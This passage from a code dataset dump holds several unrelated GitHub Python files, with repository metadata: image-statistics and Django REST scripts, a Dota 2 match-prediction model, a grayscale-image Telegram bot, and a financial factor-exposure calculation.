*\n\nPATH_dict = {\n '10K': 'M:/R&D/Technology access controlled/Projects access controlled/AIFoss/Data/Foss_student/tenkblobs/',\n 'gamer': 'C:/Data/DeepEye/Foss_student/tenkblobs/',\n '224' : 'M:/R&D/Technology access controlled/Projects access controlled/AIFoss/Data/Foss_student/tenhblobsA/',\n 'validation' : 'C:/ASB/Projects/EyefossAutoencoder/Fagprojekt-2021/validation_grain/',\n 'mix' : 'C:/ASB/Projects/EyefossAutoencoder/Fagprojekt-2021/grainmix'\n}\n\npath = PATH_dict['validation']\n\nmu = np.load('../MEAN.npy')\nstd = np.load('../STD.npy')\n\nprint(f'mean: {mu}\\n std:{std}')\n\n\nS = transforms.Compose([Mask_n_pad(H=180, W=80), transforms.ToTensor()])\nDataset = KornDataset(data_path=path, transform=S, label_path=None)\n\nbatchsize = 2000\nprint(120000/batchsize)\n\nSTATloader = DataLoader(Dataset, batch_size=batchsize, num_workers=0)\n\nTens = transforms.ToTensor()\n\nmeans = []\nstds = []\n\nrun_mean = 0\nrun_std = 0\n\nfor inputs, label in tqdm(STATloader, colour='green'):\n #print(inputs[0][0][80:90])\n temp_mean = torch.mean(inputs, dim=(0, 2, 3))\n temp_std = torch.std(inputs, dim=(0, 2, 3))\n\n run_mean += temp_mean\n run_std += temp_std\n\n\n\nrun_mean /= 120000/batchsize\nrun_std /= 120000/batchsize\n\n\nnp.save('../MEAN', run_mean)\nnp.save('../STD', 
run_std)\n\nprint(run_mean)\nprint(run_std)\n\n\n\n\n\n\"\"\"\n\nPATH_dict = {'10K': 'M:/R&D/Technology access controlled/Projects access controlled/AIFoss/Data/Foss_student/tenkblobs/',\n 'gamer': 'C:/Data/DeepEye/Foss_student/tenkblobs/'}\n\n### If training on Foss Laptop select '10K'\n### If training on Gamer select 'gamer'\nPATH = PATH_dict['gamer']\n\ndef stat_npy_dir(path: str, subset: str):\n path = path + subset\n\n\n data_x = []\n data_y = []\n\n folder = listdir(path)\n folder_images = len(folder)\n for i, NPY in enumerate(folder):\n\n if i % 10 == 0:\n\n print(f'Images loaded: [{i}/{folder_images}] ------ {str(datetime.datetime.now())[11:-7]}')\n\n img, _ = np.load(path+NPY, allow_pickle=True)\n data_x.append(img)\n\n\n print(f'Done reading {subset} images')\n wx = torch.tensor(data_x, dtype=torch.float)\n print('Begining permute')\n tx = wx.permute(0, 3, 1, 2)\n print('Finished permute')\n\n mean = torch.mean(tx, dim=(0, 2, 3))\n std = torch.std(tx, dim=(0, 2, 3))\n\n np.save('10K_mean', mean)\n np.save('10K_std', std)\n\n print(mean)\n print(std)\n\n\nstat_npy_dir(PATH,'train/')\n\n#xtrain = torch.normal(mean=10, std=2, size=(100, 8, 10, 10))\n\"\"\"", "repo_name": "Eortvald/Foss-autoencoder", "sub_path": "autoencoder/mean-std_dataset.py", "file_name": "mean-std_dataset.py", "file_ext": "py", "file_size_in_byte": 2733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "9926975845", "text": "from .models import ThesisProject, Invite\nfrom .serializers import ThesisProjectSerializer, InviteSerializer\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets, mixins\n\n\nclass CustomViewSet(\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n pass\n\n\nclass ThesisProjectsViewSet(CustomViewSet):\n queryset = ThesisProject.objects.all()\n serializer_class = ThesisProjectSerializer\n\n @action(detail=False, methods=[\"get\"])\n def ongoing(self, request):\n user = request.user\n queryset = self.get_queryset().filter(approved=False, author__user=user)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=[\"get\"])\n def approved(self, request):\n user = request.user\n queryset = self.get_queryset().filter(approved=True, author__user=user)\n serializer = self.get_serializer(queryset, many=True)\n 
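# mirrors ongoing() above, differing only in the approved=True filter\n 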
return Response(serializer.data)\n\n\nclass InvitesViewSet(viewsets.ModelViewSet):\n queryset = Invite.objects.all()\n serializer_class = InviteSerializer\n\n @action(detail=True, methods=[\"post\"])\n def accept(self, request, pk=None):\n user = request.user\n invite = (\n self.get_queryset()\n .filter(accepted=False, id=pk, advised__user=user)\n .first()\n )\n\n if not invite:\n return Response({\"error\": \"Convite não encontrado.\"})\n\n research_title = f\"Pesquisa de {invite.advised.user}\"\n\n research = ThesisProject.objects.create(\n invite=invite,\n title=research_title,\n type=invite.type,\n advisor=invite.advisor,\n author=invite.advised,\n )\n\n research.save()\n\n invite.accepted = True\n invite.save()\n\n return Response()\n\n def get_queryset(self):\n user = self.request.user\n queryset = super().get_queryset()\n queryset = queryset.filter(advised__user=user)\n return queryset\n", "repo_name": "patrickbindelli/gestao-tcc-back", "sub_path": "research/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2181, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 13, "usage_type": "name"}, {"api_name": "models.ThesisProject.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.ThesisProject.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.ThesisProject", "line_number": 19, "usage_type": "name"}, {"api_name": "serializers.ThesisProjectSerializer", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Invite.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Invite.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Invite", "line_number": 38, "usage_type": "name"}, {"api_name": "serializers.InviteSerializer", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 51, "usage_type": "call"}, {"api_name": "models.ThesisProject.objects.create", "line_number": 55, "usage_type": "call"}, {"api_name": "models.ThesisProject.objects", 
"line_number": 55, "usage_type": "attribute"}, {"api_name": "models.ThesisProject", "line_number": 55, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "23928396318", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 10 16:10:56 2021\r\n\r\n@author: Tooru Ogata y Jhosua Torres\r\nproyect: Predicción de resultados de partidas de dota2\r\n\r\nsource: https://www.opendota.com/explorer\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\n\r\npath = r'D:\\Otros Proyectos\\Dota2\\data'\r\nos.chdir(path)\r\n\r\nyear_0 = 2018\r\nyear_1 = 2021\r\n\r\nroot_filename = 'query2_dota2_'\r\n\r\n'''\r\n1. Abriendo la data\r\n'''\r\n\r\nteam_name = pd.read_csv('dota2_team.csv')\r\nteam_name.columns = ['team_id','team_name', 'team_tag']\r\n\r\ndf_append = pd.DataFrame()\r\nfor year in range(year_0,year_1+1):\r\n filename = str(root_filename) + str(year) + r'.csv'\r\n df = pd.read_csv(filename)\r\n df['year'] = year\r\n df_append = df_append.append(df)\r\n del df \r\n\r\ndf_append['team_id'] = np.where(df_append['radiant_win'] == df_append['win'], df_append['radiant_team_id'], df_append['dire_team_id'])\r\ndf_append.columns\r\n\r\ndf_append = pd.merge(df_append, team_name, left_on=['team_id'] , right_on=['team_id'], how='left')\r\n\r\n \r\n'''\r\n2. Feature Engineering\r\n''' \r\n\r\ndf_append.columns\r\n\r\n#Maestro de teams\r\ndf_teams = df_append[['year','match_id','team_name','win']]\r\ndf_teams = pd.get_dummies(df_teams, prefix='win', columns=['win'])\r\ndf_teams = df_teams.dropna()\r\ndf_teams = df_teams.drop_duplicates()\r\n\r\n#Creación de dummies\r\nrole_list = ['Support','Nuker','Initiator','Escape','Durable','Disabler','Carry','Jungler','Pusher' ]\r\n\r\nfor rol in role_list:\r\n df_append[rol] = df_append['roles'].str.contains(rol).astype(int)\r\n\r\ndf_append = pd.get_dummies(df_append, prefix='attribute', columns=['primary_attr'])\r\ndf_append = pd.get_dummies(df_append, prefix='attack', columns=['attack_type'])\r\n\r\n#Group by player/hero last 5-10 matches\r\ndf_player = df_append\r\ndf_player = df_player.drop(labels=[\"team_name\"], axis=1)\r\ndf_player = df_player.groupby(['win','year','match_id','start_time','account_id','hero_id','name'], as_index=False).agg( duration=('duration','mean'), \r\n sum_support=('Support','sum'), \r\n sum_nuker=('Nuker','sum'), \r\n sum_initiator=('Initiator','sum'), \r\n sum_escape=('Escape','sum'), \r\n sum_durable=('Durable','sum'), \r\n sum_disabler=('Disabler','sum'), \r\n sum_carry=('Carry','sum'), \r\n sum_jungler=('Jungler','sum'), \r\n sum_pusher=('Pusher','sum'), \r\n sum_agi=('attribute_agi','sum'), \r\n sum_int=('attribute_int','sum'), \r\n sum_str=('attribute_str','sum'), \r\n sum_melee=('attack_Melee','sum'), \r\n sum_ranged=('attack_Ranged','sum'), \r\n sum_kills=('kills','sum'), \r\n sum_deaths= ('deaths','sum'),\r\n sum_assists= ('assists','sum'),\r\n mean_lasthits= ('last_hits','mean'),\r\n mean_denies= ('denies','mean'),\r\n sum_observers= ('observers_placed','sum'),\r\n sum_towers= ('towers_killed','sum'),\r\n mean_gold_min=('gold_per_min','mean'),\r\n mean_exp_min=('xp_per_min','mean'))\r\n\r\n\r\n\r\n\r\n\r\ndf_append.columns\r\n\r\n#Group by sum y mean a nivel de match\r\ndf_append = df_append.groupby(['win','year','match_id','start_time'], as_index=False).agg( duration=('duration','mean'), \r\n sum_support=('Support','sum'), \r\n 
sum_nuker=('Nuker','sum'), \r\n sum_initiator=('Initiator','sum'), \r\n sum_escape=('Escape','sum'), \r\n sum_durable=('Durable','sum'), \r\n sum_disabler=('Disabler','sum'), \r\n sum_carry=('Carry','sum'), \r\n sum_jungler=('Jungler','sum'), \r\n sum_pusher=('Pusher','sum'), \r\n sum_agi=('attribute_agi','sum'), \r\n sum_int=('attribute_int','sum'), \r\n sum_str=('attribute_str','sum'), \r\n sum_melee=('attack_Melee','sum'), \r\n sum_ranged=('attack_Ranged','sum'), \r\n sum_kills=('kills','sum'), \r\n sum_deaths= ('deaths','sum'),\r\n sum_assists= ('assists','sum'),\r\n mean_lasthits= ('last_hits','mean'),\r\n mean_denies= ('denies','mean'),\r\n sum_observers= ('observers_placed','sum'),\r\n sum_towers= ('towers_killed','sum'),\r\n mean_gold_min=('gold_per_min','mean'),\r\n mean_exp_min=('xp_per_min','mean'))\r\n\r\n#Porcentaje de roles\r\ndf_append['sum_roles'] = df_append['sum_support'] + df_append['sum_nuker'] + df_append['sum_initiator'] + df_append['sum_escape'] + df_append['sum_durable'] + df_append['sum_disabler'] + df_append['sum_carry'] + df_append['sum_jungler'] + df_append['sum_pusher'] \r\n\r\ndf_append['sum_support'] = df_append['sum_support']/df_append['sum_roles'] \r\ndf_append['sum_nuker'] = df_append['sum_nuker']/df_append['sum_roles'] \r\ndf_append['sum_initiator'] = df_append['sum_initiator']/df_append['sum_roles'] \r\ndf_append['sum_escape'] = df_append['sum_escape']/df_append['sum_roles'] \r\ndf_append['sum_durable'] = df_append['sum_durable']/df_append['sum_roles'] \r\ndf_append['sum_disabler'] = df_append['sum_disabler']/df_append['sum_roles'] \r\ndf_append['sum_carry'] = df_append['sum_carry']/df_append['sum_roles'] \r\ndf_append['sum_jungler'] = df_append['sum_jungler']/df_append['sum_roles'] \r\ndf_append['sum_pusher'] = df_append['sum_pusher']/df_append['sum_roles'] \r\n\r\n#Porcentaje primary attribute\r\ndf_append['sum_agi'] = df_append['sum_agi']/5\r\ndf_append['sum_int'] = df_append['sum_int']/5\r\ndf_append['sum_str'] = df_append['sum_str']/5\r\n\r\n#Porcentaje melee/ranged\r\ndf_append['sum_melee'] = df_append['sum_melee']/5\r\ndf_append['sum_ranged'] = df_append['sum_ranged']/5\r\n\r\n#Target dummy result win and lose\r\ndf_append = pd.get_dummies(df_append, prefix='win', columns=['win'])\r\n\r\n#Merge to teams first non missing\r\ndf_append = pd.merge(df_append, df_teams, left_on=['year','match_id', 'win_False', 'win_True'] , right_on=['year','match_id', 'win_False', 'win_True'], how='left')\r\ndel df_teams\r\n\r\ndf_append.to_csv('data_consolidada.csv')\r\n\r\n'''\r\n3. 
Models 1\r\n''' \r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndf_append = pd.read_csv('data_consolidada.csv')\r\n\r\nx = df_append[['duration', 'sum_support',\r\n       'sum_nuker', 'sum_initiator', 'sum_escape', 'sum_durable',\r\n       'sum_disabler', 'sum_carry', 'sum_jungler', 'sum_pusher', 'sum_agi',\r\n       'sum_int', 'sum_str', 'sum_melee', 'sum_ranged', 'sum_kills',\r\n       'sum_deaths', 'sum_assists', 'mean_lasthits', 'mean_denies',\r\n       'sum_observers', 'sum_towers', 'mean_gold_min', 'mean_exp_min']]\r\ny = df_append['win_True']\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.3)\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\nmodel = LinearRegression()\r\n\r\nmodel.fit(x_train, y_train)\r\n\r\nprint(model.coef_)\r\nprint(model.intercept_)\r\n\r\npd.DataFrame(model.coef_, x.columns, columns = ['Coeff'])\r\n\r\npredictions = model.predict(x_test)\r\n\r\nplt.scatter(y_test, predictions)\r\nplt.hist(y_test - predictions)\r\n\r\nfrom sklearn import metrics\r\n\r\nprint('MAE')\r\nprint(metrics.mean_absolute_error(y_test, predictions))\r\nprint('MSE')\r\nprint(metrics.mean_squared_error(y_test, predictions))\r\nprint('root-MSE')\r\nprint(np.sqrt(metrics.mean_squared_error(y_test, predictions)))\r\n\r\n'''\r\n4. Models 2 - a\r\n'''\r\n\r\nimport pandas as pd\r\nimport re\r\n\r\ndf_append = pd.read_csv('data_consolidada.csv')\r\ndf_append = df_append.dropna()\r\n\r\ndf_append['team_name'] = df_append['team_name'].map(lambda x: re.sub(r'[^a-zA-Z0-9\\._-]', '', x))\r\n\r\ndf_append = pd.get_dummies(df_append, prefix='team', columns=['team_name'])\r\n\r\ndf_2021 = df_append.query('(year == 2021)')\r\ndf_append = df_append.query('(year != 2021)')\r\n\r\nfrom numpy import loadtxt\r\nfrom xgboost import XGBClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nX = df_append[['sum_support',\r\n       'sum_nuker', 'sum_initiator', 'sum_escape', 'sum_durable',\r\n       'sum_disabler', 'sum_carry', 'sum_jungler', 'sum_pusher', 'sum_agi',\r\n       'sum_int', 'sum_str', 'sum_melee', 'sum_ranged'\r\n       ]]\r\nY = df_append['win_True']\r\n\r\nmax_depth = [6,8,10]\r\nreg_alpha = [0.5,1.5,2.5]\r\nreg_lambda = [1.5,2.5,3.5]\r\nn_estimators = [100,300,500]\r\n\r\nfor rdepth in max_depth:\r\n    for ralpha in reg_alpha:\r\n        for rlambda in reg_lambda:\r\n            for restimator in n_estimators:\r\n\r\n                seed = 7\r\n                test_size = 0.33\r\n                X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\r\n                \r\n                # fit model on training data\r\n                model = XGBClassifier(gamma=0, \r\n                              learning_rate=0.300000012,\r\n                              max_depth=rdepth,\r\n                              n_estimators=restimator, \r\n                              reg_alpha=ralpha, \r\n                              reg_lambda=rlambda, \r\n                              scale_pos_weight=1, subsample=1,\r\n                              tree_method='exact', validate_parameters=1, verbosity=None, \r\n                              eval_metric='logloss',\r\n                              objective = 'binary:logistic')\r\n                model.fit(X_train, y_train)\r\n                \r\n                print('max_depth - ' + str(rdepth))\r\n                print('reg_alpha - ' + str(ralpha))\r\n                print('reg_lambda - ' + str(rlambda))\r\n                print('n_estimators - ' + str(restimator))\r\n                #print(model)\r\n                \r\n                # make predictions for test data\r\n                y_pred = model.predict(X_test)\r\n                predictions = [round(value) for value in y_pred]\r\n                \r\n                # evaluate predictions\r\n                accuracy = accuracy_score(y_test, predictions)\r\n                print(\"Test - Accuracy: %.2f%%\" % (accuracy * 100.0))\r\n    \r\n    '''\r\n    4. 
Models 2 - b\r\n '''\r\n # Predict in 2021\r\n X = df_2021[['sum_support',\r\n 'sum_nuker', 'sum_initiator', 'sum_escape', 'sum_durable',\r\n 'sum_disabler', 'sum_carry', 'sum_jungler', 'sum_pusher', 'sum_agi',\r\n 'sum_int', 'sum_str', 'sum_melee', 'sum_ranged', \r\n ]]\r\n Y = df_2021['win_True']\r\n \r\n # make predictions for test data\r\n y_pred = model.predict(X)\r\n predictions = [round(value) for value in y_pred]\r\n \r\n # evaluate predictions\r\n accuracy = accuracy_score(Y, predictions)\r\n print(\"Validation - Accuracy: %.2f%%\" % (accuracy * 100.0))\r\n\r\n\r\nimport pickle\r\n\r\nfilename = 'dota2_model'\r\npickle.dump(model, open(filename, 'wb'))", "repo_name": "Tooruogata/DotaMatchPrediction", "sub_path": "01_Transformacion_Modeling.py", "file_name": "01_Transformacion_Modeling.py", "file_ext": "py", "file_size_in_byte": 14246, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 177, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 181, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 198, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 198, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 200, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 202, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 211, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 214, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 245, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 248, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 271, "usage_type": "call"}, {"api_name": 
"sklearn.metrics.accuracy_score", "line_number": 290, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 297, "usage_type": "call"}]} +{"seq_id": "561536400", "text": "from telegram import (ReplyKeyboardMarkup, ReplyKeyboardRemove)\nfrom telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, RegexHandler,\n ConversationHandler)\n\nimport logging\nimport os\nfrom PhotoProc import Grayscale\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ndef start(bot, update):\n\tupdate.message.reply_text(\"Hi! Send a image and I will send you it in black and white\")\n\ndef help(bot, update):\n\tupdate.message.reply_text(\"Send a image and I will send you it in black and white\")\n\ndef ReplyBWImage(bot, update):\n user = update.message.from_user\n photo_file = bot.get_file(update.message.photo[-1].file_id)\n photoName = str(update.message.chat_id)+\"Normal.png\"\n photo_file.download(photoName)\n \n photoGS = Grayscale(photoName)\n\n update.message.reply_photo(photo=open(photoGS, 'rb'))\n\n os.remove(photoGS)\n os.remove(photoName)\n\ndef error(bot, update, error):\n\tlogger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\n\ndef main():\n\tupdater = Updater(\"token\")\n\n\tdp = updater.dispatcher\n\tdp.add_handler(CommandHandler(\"start\", start))\n\tdp.add_handler(CommandHandler(\"help\", help))\n\n\tdp.add_handler(MessageHandler(Filters.photo, ReplyBWImage))\n\n\tdp.add_error_handler(error)\n\n\tupdater.start_polling()\n\tupdater.idle()\n\nif __name__ == '__main__':\n\tmain()", "repo_name": "digitaldav/Grayscale-Telegram-Bot", "sub_path": "TelegramBot.py", "file_name": "TelegramBot.py", "file_ext": "py", "file_size_in_byte": 1444, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "PhotoProc.Grayscale", "line_number": 27, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 43, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 45, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.photo", "line_number": 45, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "13188595398", "text": "import os\nimport datetime as dt\nimport sys\nimport pandas as pd\nfrom skyrim.falkreath import CLib1Tab1\nfrom skyrim.falkreath import CManagerLibWriter\n\n\ndef cal_corr(t_sub_df: pd.DataFrame, t_x: str, t_y: str, t_sort_var: str, t_top_size: int):\n _sorted_df = t_sub_df.sort_values(by=t_sort_var, ascending=False)\n _top_df = _sorted_df.head(t_top_size)\n _r = _top_df[[t_x, t_y]].corr(method=\"spearman\").at[t_x, t_y]\n return -_r\n\n\ndef fac_exp_alg_cx(\n run_mode: str, bgn_date: str, stp_date: str | None,\n cx: str, cx_window: int, top_prop: float,\n instruments_universe: list[str],\n database_structure: dict[str, CLib1Tab1],\n 
major_return_dir: str,\n factors_exposure_dir: str,\n):\n \"\"\"\n\n :param run_mode:\n :param bgn_date:\n :param stp_date:\n :param cx: must be one of [\"CSP\", \"CSR\", \"CTP\", \"CTR\", \"CVP\", \"CVR\"]\n :param cx_window:\n :param top_prop:\n :param instruments_universe:\n :param database_structure:\n :param major_return_dir:\n :param factors_exposure_dir:\n :return:\n \"\"\"\n factor_lbl = \"{}{:03d}T{:02d}\".format(cx, cx_window, int(top_prop * 10))\n if stp_date is None:\n stp_date = (dt.datetime.strptime(bgn_date, \"%Y%m%d\") + dt.timedelta(days=1)).strftime(\"%Y%m%d\")\n top_size = int(cx_window * top_prop) + 1\n if cx.upper() == \"CSP\":\n x, y = \"sigma\", \"instru_idx\"\n elif cx.upper() == \"CSR\":\n x, y = \"sigma\", \"major_return\"\n elif cx.upper() == \"CTP\":\n x, y = \"turnover\", \"instru_idx\"\n elif cx.upper() == \"CTR\":\n x, y = \"turnover\", \"major_return\"\n elif cx.upper() == \"CVP\":\n x, y = \"volume\", \"instru_idx\"\n elif cx.upper() == \"CVR\":\n x, y = \"volume\", \"major_return\"\n else:\n print(\"... Error! when calculating CX\")\n print(\"... cx = \", cx, \"is not a legal input, please check again\")\n print(\"... this function will terminate at once\")\n sys.exit()\n\n # --- init major contracts\n all_factor_dfs = []\n for instrument in instruments_universe:\n major_return_file = \"major_return.{}.close.csv.gz\".format(instrument)\n major_return_path = os.path.join(major_return_dir, major_return_file)\n major_return_df = pd.read_csv(major_return_path, dtype={\"trade_date\": str}).set_index(\"trade_date\")\n if cx.upper() in [\"CSP\", \"CSR\"]:\n major_return_df[x] = major_return_df[\"high\"] / major_return_df[\"low\"] - 1\n elif cx.upper() in [\"CTP\", \"CTR\"]:\n major_return_df[x] = major_return_df[\"volume\"] / major_return_df[\"oi\"]\n r_data = {}\n for i in range(len(major_return_df)):\n trade_date = major_return_df.index[i]\n if (trade_date < bgn_date) or (trade_date >= stp_date):\n continue\n sub_df = major_return_df.iloc[i - cx_window + 1:i + 1]\n r_data[trade_date] = cal_corr(t_sub_df=sub_df, t_x=x, t_y=y, t_sort_var=\"volume\", t_top_size=top_size)\n factor_df = pd.DataFrame({\"instrument\": instrument, factor_lbl: pd.Series(r_data)})\n all_factor_dfs.append(factor_df[[\"instrument\", factor_lbl]])\n\n # --- reorganize\n all_factor_df = pd.concat(all_factor_dfs, axis=0, ignore_index=False)\n all_factor_df.sort_index(inplace=True)\n\n # --- save\n factor_lib_structure = database_structure[factor_lbl]\n factor_lib = CManagerLibWriter(\n t_db_name=factor_lib_structure.m_lib_name,\n t_db_save_dir=factors_exposure_dir\n )\n factor_lib.initialize_table(t_table=factor_lib_structure.m_tab, t_remove_existence=run_mode in [\"O\", \"OVERWRITE\"])\n factor_lib.update(t_update_df=all_factor_df, t_using_index=True)\n factor_lib.close()\n\n print(\"... 
@ {} factor = {:>12s} calculated\".format(dt.datetime.now(), factor_lbl))\n return 0\n", "repo_name": "huxiaoou/Project_2023_06_EquityIndex_ML_V2", "sub_path": "algs/factor_exposure_cx.py", "file_name": "factor_exposure_cx.py", "file_ext": "py", "file_size_in_byte": 3769, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "attribute"}, {"api_name": "skyrim.falkreath.CLib1Tab1", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 81, "usage_type": "call"}, {"api_name": "skyrim.falkreath.CManagerLibWriter", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}]} +{"seq_id": "14959002823", "text": "\"\"\"You are given two positive integer arrays spells and potions, of length n and m respectively, where spells[i]\nrepresents the strength of the ith spell and potions[j] represents the strength of the jth potion.\n\nYou 